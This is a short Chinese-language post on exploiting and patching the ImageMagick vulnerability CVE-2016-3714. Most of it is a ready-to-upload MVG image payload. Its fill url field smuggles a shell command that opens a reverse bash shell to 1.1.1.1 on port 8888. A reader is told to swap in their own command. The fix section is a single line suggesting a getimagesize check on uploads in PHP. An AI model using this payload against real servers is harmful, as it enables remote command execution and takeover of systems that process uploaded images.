ImageMagick漏洞（cve-2016-3714）利用及修复

利用：

如下内容保存为图片格式上传即可（命令部分自行替换）

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context

修复（php）：

上传时先利用getimagesize函数检查是否为正常图片